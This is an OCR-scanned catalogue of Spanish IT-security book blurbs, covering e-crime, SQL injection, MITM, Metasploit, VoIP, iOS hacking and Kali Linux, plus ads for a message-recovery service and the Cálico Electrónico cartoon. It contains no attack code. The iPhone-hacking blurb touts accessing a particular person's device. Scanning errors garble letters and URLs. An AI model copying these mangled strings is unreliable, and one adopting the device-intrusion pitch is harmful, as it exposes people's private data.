ser capaces de detectar otros nuevos... y combinar herramientas. 


En este libro podrá ver y conocer, desde la experiencia profesional 
Fraude online en el mundo del e-crime, cómo se organizan las estafas, qué 

р herramientas se utilizan y cuáles son los mecanismos existentes 
para conseguir transformar en dinero contante, el capital robado 
digitalmente a través de Internet. Un texto imprescindible para 
conocer a lo que todos nos enfrentamos en Internet hoy en día y 
así poder tomar las medidas de seguridad apropiadas. 


Dani Creus y Mikel Gastesi forman parte de un equipo 
multidisciplinar de reconocidos especialistas en e-crime y 
seguridad en 52/ѕес. Entre sus funciones destacan las tareas de 
análisis e investigación de temas relacionados con la seguridad y 
fraudes electrónicos. 
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Máxima Seguridad en Windows 


Hacking y seguridad 
en comunicaciones móvil 
GSM/GPRS/UMTS/LTE 


Esquema Nacional de Seguridad 
con Microsoft 


Hoy en día no sufrimos las mismas amenazas (ni en cantidad ni 
en calidad) que hace algunos años. Y no sabemos cuáles serán log 
retos del mañana, Hoy el problema más grave es mitigar el impacto 
causado por las vulnerabilidades en el software y la complejidad 
de los programas. Y eso no se consigue con una guía “tradicional”, 
Y mucho menos si se perpetúan las recomendaciones “de toda 
la vida” como “cortafuegos”, “antivirus” y “sentido común”, 
¿Acaso no disponemos de otras armas mucho más potentes? No. 
Disponemos de las herramientas “tradicionales” muy mejoradas, 
cierto, pero también de otras tecnologías avanzadas para mitigar las 
amenazas. El problema es que no son tan conocidas ni simples, Por 
tanto es necesario leer el manual de instrucciones, entenderlas... y 
aprovecharlas... 


Más de 3.000 millones de usuarios en más de 200 países utilizamos 
diariamente las comunicaciones móviles GSM/GPRS/UMTS 
(2G/3G) para llevar a cabo conversaciones y transferencias de 
datos. Pero, ¿son seguras estas comunicaciones?, En los últimos 
años se han hecho públicos múltiples vulnerabilidades y ejemplos 
de ataques prácticos contra GSM/GPRS/UMTS que han puesto en 
evidencia que no podemos simplemente confiar en su seguridad.. 


Descubra en este libro cuáles son las vulnerabilidades y los. 
ataques contra GSM/GPRS/UMTS (2G/3G) y el estado respecto а 
la nueva tecnología LTE, comprenda las técnicas y conocimientos 
que subyacen tras esos ataques y conozca qué puede hacer para 
proteger sus comunicaciones móviles. 


La Administración Española lidera un encomiable esfuerzo hacia 
el Desarrollo de la Sociedad de la Información en España, así 
como en el uso óptimo de las tecnologías de la Información en pro 
de una prestación de servicios más eficiente hacia los ciudadanos. 
Aunque este tipo de contenidos no siempre son fáciles de tratar 
sin caer en un excesivo dogmatismo, sí es cierto que en el marco 
de la Ley 11/2007 del 22 de Junio, de acceso electrónico de los. 
ciudadanos a los Servicios Püblicos, se anunció la creación de los 
Esquemas Nacionales de Interoperabilidad y de Seguridad con la 
misión de garantizar un derecho ciudadano, lo que sin duda es un 
reto y una responsabilidad de primera magnitud. Este manual sirve 
para facilitar a los responsables de seguridad el cumplimiento de 
los aspectos tecnológicos derivados del cumplimiento del ENS. 
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19 de Aplicacio 


SQL Injection 


wel 


No es de extrañar que los programas contengan fallos, errores, 
que, bajo determinadas circunstancias los hagan funcionar de 
forma extraña. Que los conviertan en algo para lo que no estaban 
diseñados. Aquí es donde entran en juego los posibles atacantes. 
Pentesters, auditores... y ciberdelincuentes. Para la organización, 
mejor que sea uno de los primeros que uno de los ültimos. Pero para 
la aplicación, que no entra en valorar intenciones, no hay diferencia 
entre ellos. Simplemente, son usuarios que hablan un extraño 
idioma en que los errores se denominan “vulnerabilidades”, y una 
aplicación defectuosa puede terminar convirtiendose, por ejemplo, 
en una interfaz de usuario que le permita interactuar directamente 
con la base de datos. Y basta con un único error. 


Las redes de datos IP hace mucho tiempo que gobiernan nuestras 
sociedades. Empresas, gobiernos y sistemas de interacción 
social se basan en redes TCP/IP. Sin embargo, estas redes tienen 
vulnerabilidades que pueden ser aprovechadas por un atacante 
para robar contraseñas, capturar conversaciones de voz, mensajes 
de correo electrónico o información transmitida desde servidores. 
En este libro se analizan cómo funcionan los ataques de man in 
the middle en redes IPv4 o IPv6, cómo por medio de estos ataques 
se puede crackear una conexión VPN PPTP, robar la conexión de 
un usuario al Active Directory o cómo suplantar identificadores 
en aplicaciones para conseguir perpetrar una intrusión además del 
ataque SLAAC, el funcionamiento de las técnicas ARP-Spoofing, 
Neighbor Spoofing en IPv6, etcétera. 


Hoy día es innegable el imparable crecimiento que han tenido las 
tecnologías de los dispositivos móviles en los ültimos afios. El 
nümero de smartphones, tablets, etc. han aumentado de manera 
exponencial. Esto ha sido así, hasta tal punto que actualmente 
estos dispositivos se han posicionado como tecnologías de máxima 
prioridad para muchas empresas. 

Con este libro se pueden adquirir los conocimientos necesarios 
para desarrollar aplicaciones en /OS, guiando al lector para que 
aprenda a utilizar las herramientas y técnicas básicas para iniciarse 
en el mundo iOS. Se pretende sentar unas bases, de manera que al 
finalizar la lectura, el lector pueda convertirse en desarrollador ¿OS 
y enfrentarse a proyectos de este sistema operativo por sí mismo. 
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Windows Server 2012 
para IT Pros 


Informática: 


Metasploit 


Hoy en día la administración de los sistemas es de vital importancia 
en toda empresa moderna. PowerShell ofrece al administrador la 
posibilidad de automatizar las tareas cotidianas proporcionando 
un potente lenguaje de scripting. El libro está estructurado en 
distintas temáticas, que ofrecen al lector una introducción a la 
interacción con la potente línea de comandos de Microsoft, las 


bases y pilares para el desarrollo de potentes scripts seguros, y la 
gestión de productos de Microsoft desde PowerShell, como son. 
Hyper-V, Active Directory, SharePoint, SQL Server o IIS. Otro 
de los aspectos a tratar es la seguridad. El enfoque práctico del 
libro ayuda al administrador, a entender los distintos y variados 


conceptos que ofrece PowerShell. 


Microsoft Windows Server 2012 ha llegado con novedades cuyo 
objetivo es simplificar las, cada vez más, complejas tareas de 
los administradores y profesionales IT. En el presente libro 


se recogen la gran mayoría de dichas novedades entre las que 
destacan la versión 3.0 de Hyper-V, el servidor de virtualización 
de Microsoft, el almacenamiento con su nuevo sistema de archivos 
y sus propiedades, las mejoras y nuevas características de Active 
Directory, DNS y DHCP, las novedosas fórmulas de despliegue 
eficiente, la ampliación mejora de la línea de comandos 
hell, y como no, la seguridad, un pilar 
básico en la estructura de los productos Microsoft La idea del libro: 
es presentar las novedades y ahondar en los conceptos principales; 


Microsoft Windows Powei 


La seguridad de la información es uno de los mercados en auge еп 
la Informática hoy en día. Los 
activos por lo que deben protegerlos de aci 


gobiernos y empresas valoran sus 
esos ilícitos mediante 


el uso de auditorías que proporcionen un status de seguridad à 
nivel organizativo. El pentesting forma parte de las auditorías 
de seguridad y proporciona un conjunto de pruebas que valoren 
el estado de la seguridad de la organización en ciertas fases. 
Metasploit es una de las herramientas más utilizadas en procesos 
de pentesting ya que contempla distintas fases de un test de 
intrusión. Con el presente libro se pretende obtener una visión 
global de las fases en las que Merasploit puede ofrecer su potencia 
y flexibilidad al servicio del hacking ético. 
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Microhistorias: 
anécdotas y curiosidades 
de la Informática 


— mi 
Hacker Epico 


Informática 


Hacking y Seguridad 
VoIP 


¿Sabías que Steve Jobs le llevó en persona un ordenador Macintosh 
a Yoko Ono y también a Mick Jagger? гҮ que Jay Miner, el genio 
que creó el Amiga 1000 tenía una perrita que tomaba parte en 
algunas de las decisiones de diseño de este ordenador? ¿O que 
Xenix fue el sistema UNIX más usado en los 80s en ordenadores y 
que era propiedad de Microsoft? 


Estas son sólo algunas de las historias y anécdotas que encontrarás 
en este libro de Microhistorias. Una parte importante de las cuales 
tienen como protagonista a los miembros de Microsoft y de Apple. 


Historias de hackers, phreakers, programadores y diseñadores 
cuya constancia y sabiduría nos sirven de inspiración y de ejemplo 
para nuestros proyectos de hoy en día. 


Ángel Ríos, auditor de una empresa puntera en el sector de 
la seguridad informática se prepara para acudir a una cita con 
Yolanda, antigua сотрайега de clase de la que siempre ha estado 
enamorado. Sin embargo, ella no está interesada en iniciar una 
relación; sólo quiere que le ayude a descifrar un mi і 
archivo. Ángel se ve envuelto en una intriga que complicará su 
vida y lo expondrá a un grave peligro. Únicamente contará con sus 
conocimientos de hacking y el apoyo de su amigo Marcos. 


Mezcla de novela negra y manual técnico, este libro aspira 
a entretener e informar a partes iguales sobre un mundo tan 
apasionante como es el de la seguridad informática. Técnicas de 
hacking web, sistemas y análisis forense, son algunos de los temas 
que se tratan con total rigor y excelentemente documentados. 


La evolución de VoIP ha sido considerable, siendo hoy día una 
alternativa muy utilizada como solución única de telefonía en 
muchísimas empresas. Gracias a la expansión de Internet y 
a las redes de alta velocidad, llegará un momento en el que las 
líneas telefónicas convencionales sean totalmente sustituidas por 
sistemas de VoIP, dado el ahorro económico no sólo en llamadas 
sino también en infraestructura. 

El gran problema es la falta de concienciación en seguridad. Las 
empresas aprenden de los errores a base de pagar elevadas facturas 
y a causa de sufrir intrusiones en sus sistemas. 

Este libro muestra cómo hacer un test de penetración en un sistema 
de VoIP así como las herramientas más utilizadas para atacarlo, 


repasando además los fallos de configuración más comunes. 
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Wardog y el mundo 


Desarrollo de aplicaciones 
Android seguras 


Informática 


¿Has pensado alguna vez por qué coño el informático tiene siempre 
esa cara de orco? ¿Por qué siempre está enfadado? ¿Por qué no se 
relaciona con la gente de la oficina? 

Yo te lo digo: por tu culpa. Por vuestra culpa. Por las burradas 
que hacéis, Porque no os podéis estar quietecitos, no... Porque ов 
creéis que el informático tiene la solución para todo, 


Pasa, pasa, y entérate de qué pasa.por la cabeza de Wardog, un 
administrador de sistemas renegado, con afán de venganza, con 
maldad y con mala hostia. 

Wardog y el mundo es el producto de años de exposición a lusers 
dotados de estupidez tóxica, de mala baba destilada y acidez de 
estómago. Y café en cantidades malsanas. 


Actualmente, el mundo de las aplicaciones móviles es uno de los 
sectores que más dinero mueve en el mercado de la informática, 
Tener conocimientos de programación en estas plataformas 
а poder encontrar empleo a día de hoy, 


móviles es una garantía pa 


“Desarrollo de aplicaciones Android seguras” pretende inculcar 
al lector una base sólida de conocimientos sobre programación 
en la plataforma móvil con mayor cuota de mercado del mundo; 
Android. Mediante un enfoque eminentemente práctico, el libro 
guiará al lector en el desarrollo de las funcionalidades más 
demandadas a la hora de desarrollar una aplicación móvil. Además 
se pretende educar al programador e introducirle en la utilización 
de técnicas de diseño que modelen aplicaciones seguras, en la parte 
de almacenamiento de datos y en la parte de comunicaciones. 


Este libro se dedica especialmente a dos paradigmas de la 
criptografía: la clásica y RSA. Ambos los trata a fondo con el 
ánimo de convertirse en uno de los documentos más completos en 
esta temática. Para cons 
como referencia trabajo previo de los autore: 


'guir este trabajo el texto presentado toma: 
:omplementándolo 
asequible. 


y orientándolo para hacer su lectura más 
El técnico o experto en seguridad tendrá especial interés por el 
sistema RSA, aunque le venga muy bien recordar sus inicios en 
la criptografía como texto de amena lectura y, por su parte, el 
lector no experto en Estos temas criptológicos pero sí interesado, 
seguramente le atraiga inicialmente la criptografía clásica por Su 
sencillez y sentido histórico. 
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Hardening de servidores GNU/Linux 


Hacking de dispositivos 105: 
iPhone & iPad 


табоқ 
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Este libro trata sobre la securización de entornos Linux siguiendo 
el modelo de Defensa en Profundidad. Es decir, diferenciando la 
infraestructura en diferentes capas que deberán ser configuradas 
de forma adecuada, teniendo como principal objetivo la 
seguridad global que proporcionarán. Durante el transcurso de 
esta lectura se ofrecen bases teóricas, ejemplos de configuración 
y funcionamiento, además de buenas prácticas para tratar de 
mantener un entorno lo más seguro posible. Sin duda, los entornos 
basados en Linux ofrecen una gran flexibilidad y opciones, por lo 
que se ha optado por trabajar con las tecnologías más comunes y 
utilizadas. En definitiva, este libro se recomienda a todos aquellos 
que deseen reforzar conceptos, así como para los que necesiten una 


base desde la que partir a la hora de securizar un entorno Linux 


A día de hoy se han vendido más de 500 millones de dispositivos 
¡OS y aunque la seguridad del sistema ha mejorado con cada 
versión todavía se pueden encontrar vulnerabilidades a explotar, 


Las auditorías de seguridad en empresas cada vez se encuentran con 
más dispositivos ¡OS entre sus objetivos, ya que los empleados los 
utilizan en sus puestos de trabajo, lo que hace que haya que pensar 
en ellos como posibles riesgos de seguridad. En este libro se han 
juntado un nutrido grupo de expertos en seguridad en la materia 
para recopilar en un texto, todas las formas de atacar un terminal 
iPhone o iPad de un usuario detereminado. Tras leer este libro, si 
un determinado usuario tiene un iPhone o un iPad, seguro que al 
lector se le ocurren muchas formas de conseguir la información 
que en él se guarde o de controlar lo que con él se hace. 


Kali Linux ha renovado el espíritu y la estabilidad de BackTrack 
gracias a la agrupación y selección de herramientas que son 
utilizadas diariaménte por miles de auditores. En Kali Linux se 
han eliminado las herramientas que se encontraban descatalogadas 
y se han afinado las versiones de las herramientas top. La 
cantidad de estas es lo que situa a Kali Linux, como una de 1: 
mejores 


distribuciones para auditoría de seguridad del mundo. 
El libro plantea un enfoque eminentemente práctico, priorizando 
los escenarios reproducibles por el lector, y enseñando el uso 
de las herramientas más utilizadas en el mundo de la auditoría 
informática. Kali Linux tiene la misión de sustituir a la distribución 
de seguridad por excelencia, y como se puede visualizar en este 
libro tiene razones sobradas para lograrlo 
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Recover Messages 


Recover Messages es un servicio que permite examinar y recuperar datos de aplicaciones que utilizan 
SQLite como base de datos. Dichas aplicaciones están incluidas en smartphones /Phone y Android 
principalmente, ejemplos de ello son WhatsApp, Line, SpotBros etcétera. 


Gracias a Recover Messages es posible inspeccionar y recuperar la información de ficheros SQLite 
facilitados por el usuario, que serán tratados en nuestros sistemas o en los de nuestros proveedores 
de sistemas de forma automática, y totalmente confidencial, incluyendo por supuesto las medidas 
de seguridad pertinentes. 


Tanto la incorporación de ficheros SQLite como la obtención de los datos que dichos ficheros 
almacenan, son guiados paso a paso con asistentes desde la propia web, lo que hace muy sencilla la 
utilización de este servicio pionero. 


El servicio tiene dos modalidades: 


- Gratuito. En este caso el usuario tendrá funcionalidades limitadas, siendo posible 
únicamente acceder a los mensajes WhatsApp de los dispositivos /Phone y Android. 


- Con licencia. En este caso el usuario tendrá todas las funcionalidades del servicio, que _ 
incluye además de las incluidas en la modalidad gratuita, la posibilidad de recuperar Mensaje 
SMS y Emails de /Phone y Android, además de los archivos utilizados con otras aplicaci 

de /Phone como Tuenti, SpotBros y Line. 


El servicio está disponible en castellano y en inglés en htp://recovermessages.com 


Pantalla principal de Recover Messages. 
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Cálico Electrónico 


“Cálico Electrónico” se ha convertido en la serie de animación Flash más famosa de España. En 
clave de humor y con una animación de gran calidad, Cálico Electrónico es un superhéroe "aspañol" 
alejado totalmente del patrón establecido en los superhéroes: Cálico es bajito, gordo, y no tiene 
ningún poder. Lo que sí tiene es la fijación de salvar a su ciudad "Electrónico City" de cualquier mal. 


El origen de “Cálico Electrónico” fue una campaña de márketing de una web. No obstante, el éxito 
que tuvo superó todas las expectativas y se creó una identidad propia. “Cálico Electrónico” ha hecho 
famoso a su creador, Nikodemo, que a partir de entonces creó un estudio de animación llamado 
Nikodemo Animation. Tras los éxitos iniciales, la serie tuvo 3 temporadas de 6 capítulos cada una, 
incluyéndose en ellas unas tomas falsas, al estilo de las películas con actores reales. Además de 
los capítulos oficiales se hicieron también capítulos especiales, y una serie paralela llamada “Los 
huérfanos electrónicos”. 


En la actualidad los fans de “Cálico Electrónico” pueden acceder a multitud de productos de la serie, 
ya que se han generado nuevos capitulos y se han reeditado los antiguos en alta calidad, dichos 
capítulos están disponibles para dispositivos /Phone, Windows Phone, Windows 8 o Android. 
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Aplicación de “Cálico Electrónico” para Windows Phone 


También ha aumentado la demanda de productos de Cálico, como cómics, DVDs con los capítulos 
de la serie, muñecos, camisetas, tazas, barajas de cartas y un largo etcétera 
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Ejemplos de productos de la tienda de Cálico Electrónico. 


Otra novedad son las "Tiras Cálico", que se corresponden a unas tiras cómicas de 3 o 4 viñetas, al 
estilo de otros personajes conocidos como Garfield o Mafalda. Dichas tiras aparecen cada miércoles 
y también se pueden ver en los dispositivos mencionados. Además los fans tienen la posibilidad 
de enviar sus fotos disfrazados de Cálico, o enviar sus propios dibujos de este peculiar superhéroe. 
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Ejemplo de “Tira Cálico”. 


Para que los fans estén informados, se mantienen varios canales abiertos sobre el producto: 
- Twitter: htps://twittercom/CalicoOficial 
- Google Plus: https:/plus.google.com/107186057128422961644/posts 
- Tuenti: hrip://www.tuenti.com/calicoelectronico 
- Youtube: htíp://www.youtube.com/calicoelectronicohd 
- Facebook: htíps:/4www.facebook.com/CalicoElectronicoOficial 


Además de todo esto, y para mantener vivo el proyecto, se han realizado trabajos en el mundo de la 
publicidad, visitado una docena de congresos y festivales de cómic, se ha cerrado la ilustración de 
un libro que pronto saldrá a la venta y se ha firmado un nuevo cómic con Ediciones Babylon que 
está a punto de ver la luz. 


Toda la información acerca de “Cálico Electrónico" y de los productos mencionados está disponible 
en http://www.calicoelectronico.com/ 


La distribución BackTrack ha dejado gran cantidad de seguidores en el mundo de la seguri- 
dad informática. Los pentesters utilizaban día a día estas herramientas, por lo que una con- 
tinuación de dicha distribución era casi obligada. Kali Linux ha renovado el espíritu y la 
estabilidad de BackTrack gracias a la agrupación y selección de herramientas que son utili- 
zadas diariamente por miles de auditores. En Kali Linux se han eliminado las herramientas 
que se encontraban descatalogadas y se han afinado las versiones de las herramientas top. 
Lo que realmente hace grande a Kali Linux, y la sitúa como una de las mejores distribucio- 
nes para auditoría de seguridad del mundo, es la cantidad de herramientas útiles que pro- 
porciona en un solo sistema GNU/Linux. 


El libro plantea un enfoque eminentemente práctico, priorizando los escenarios reproduci- 
bles por el lector, y enseñando el uso de las herramientas más utilizadas en el mundo de la 
auditoría informática. Kali Linux tiene la misión de sustituir a la distribución de seguridad 
por excelencia, y como se puede visualizar en este libro tiene razones sobradas para 
lograrlo. 


En los distintos capítulos se estudian las distintas facetas con las que Kali Linux puede 
ayudar a auditar los sistemas de información. La recogida de información, el análisis de vul- 
nerabilidades y la explotación de estas, son ramas de la seguridad informática que Kali 
Linux profundiza con éxito. Además, se incluyen aspectos tanto teóricos como prácticos en 
lo que se refiere a auditoría web, wireless y redes. Por último, se hace hincapié en el análisis 
forense guiado por Kali Linux con el que se pueden visualizar y estudiar interesantes casos. 
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